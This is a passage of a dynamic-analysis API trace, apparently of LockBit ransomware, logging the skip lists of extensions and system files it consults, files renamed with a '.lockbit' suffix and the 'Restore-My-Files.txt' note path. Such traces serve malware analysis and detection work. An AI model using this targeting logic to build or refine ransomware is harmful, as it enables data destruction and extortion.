pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.570] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned=".WMF" [0102.570] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.570] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.570] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.570] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.570] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.570] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.570] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.570] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.570] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.570] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.570] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.570] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.570] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.570] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.570] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.570] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.571] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.571] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.571] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.571] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.571] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.571] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.571] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.571] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.571] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.571] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.571] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.571] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.571] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.lockbit") returned 72 [0102.571] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0102.572] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.572] malloc (_Size=0x40068) returned 0x1ff1e60 [0102.572] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=6632) returned 1 [0102.572] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.573] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0102.573] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.573] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0102.573] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0102.593] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.593] malloc (_Size=0xa6) returned 0x77d800 [0102.593] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0102.594] free (_Block=0x77d800) [0102.594] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.594] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.594] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.594] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b6bc300, ftCreationTime.dwHighDateTime=0x1bd4c00, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1b6bc300, ftLastWriteTime.dwHighDateTime=0x1bd4c00, nFileSizeHigh=0x0, nFileSizeLow=0x83c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN02724_.WMF", cAlternateFileName="")) returned 1 [0102.594] lstrcmpiW (lpString1=".", lpString2="AN02724_.WMF") returned -1 [0102.594] lstrcmpiW (lpString1="..", lpString2="AN02724_.WMF") returned -1 [0102.594] PathFindExtensionW (pszPath="AN02724_.WMF") returned=".WMF" [0102.594] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.594] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.594] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.594] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.594] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.595] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.596] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.596] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.597] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.597] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.597] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.597] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.597] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN02724_.WMF") returned 1 [0102.597] lstrcmpiW (lpString1="ntldr", lpString2="AN02724_.WMF") returned 1 [0102.597] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN02724_.WMF") returned 1 [0102.597] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN02724_.WMF") returned 1 [0102.597] lstrcmpiW (lpString1="autorun.inf", lpString2="AN02724_.WMF") returned 1 [0102.597] lstrcmpiW (lpString1="thumbs.db", lpString2="AN02724_.WMF") returned 1 [0102.597] lstrcmpiW (lpString1="iconcache.db", lpString2="AN02724_.WMF") returned 1 [0102.597] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.597] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned=".WMF" [0102.597] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.597] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.597] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.597] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.597] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.597] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.597] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.597] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.597] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.597] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.598] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.598] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.lockbit") returned 72 [0102.598] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c4 [0102.600] CreateIoCompletionPort (FileHandle=0x13c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.600] malloc (_Size=0x40068) returned 0x3d70048 [0102.600] GetFileSizeEx (in: hFile=0x13c4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=2108) returned 1 [0102.600] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.600] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0102.600] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.601] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0102.601] ReadFile (in: hFile=0x13c4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0102.613] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.613] malloc (_Size=0xa6) returned 0x77d800 [0102.613] NtSetInformationFile (FileHandle=0x13c4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0102.614] free (_Block=0x77d800) [0102.614] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.614] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.614] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.614] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c87b100, ftCreationTime.dwHighDateTime=0x1bd4c18, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c87b100, ftLastWriteTime.dwHighDateTime=0x1bd4c18, nFileSizeHigh=0x0, nFileSizeLow=0x2418, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN03500_.WMF", cAlternateFileName="")) returned 1 [0102.614] lstrcmpiW (lpString1=".", lpString2="AN03500_.WMF") returned -1 [0102.614] lstrcmpiW (lpString1="..", lpString2="AN03500_.WMF") returned -1 [0102.614] PathFindExtensionW (pszPath="AN03500_.WMF") returned=".WMF" [0102.614] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.614] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.614] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.614] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.614] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.615] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.616] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.616] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.617] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.617] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN03500_.WMF") returned 1 [0102.617] lstrcmpiW (lpString1="ntldr", lpString2="AN03500_.WMF") returned 1 [0102.617] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN03500_.WMF") returned 1 [0102.617] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN03500_.WMF") returned 1 [0102.617] lstrcmpiW (lpString1="autorun.inf", lpString2="AN03500_.WMF") returned 1 [0102.617] lstrcmpiW (lpString1="thumbs.db", lpString2="AN03500_.WMF") returned 1 [0102.617] lstrcmpiW (lpString1="iconcache.db", lpString2="AN03500_.WMF") returned 1 [0102.617] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.617] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned=".WMF" [0102.617] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.617] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.617] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.617] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.617] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.617] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.617] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.617] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.617] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.617] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.617] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.618] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.618] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.618] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.618] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.618] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.618] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.618] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.618] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.618] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.618] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.618] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.618] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.618] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.618] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.618] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.618] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.618] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.618] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.lockbit") returned 72 [0102.618] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf04 [0102.619] CreateIoCompletionPort (FileHandle=0xf04, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.619] malloc (_Size=0x40068) returned 0x3df0008 [0102.619] GetFileSizeEx (in: hFile=0xf04, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9240) returned 1 [0102.619] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.620] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0102.620] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.620] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0102.620] ReadFile (in: hFile=0xf04, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0102.628] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.628] malloc (_Size=0xa6) returned 0x77d800 [0102.628] NtSetInformationFile (FileHandle=0xf04, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0102.629] free (_Block=0x77d800) [0102.629] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.629] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.629] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.629] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x928, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04108_.WMF", cAlternateFileName="")) returned 1 [0102.629] lstrcmpiW (lpString1=".", lpString2="AN04108_.WMF") returned -1 [0102.629] lstrcmpiW (lpString1="..", lpString2="AN04108_.WMF") returned -1 [0102.629] PathFindExtensionW (pszPath="AN04108_.WMF") returned=".WMF" [0102.629] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 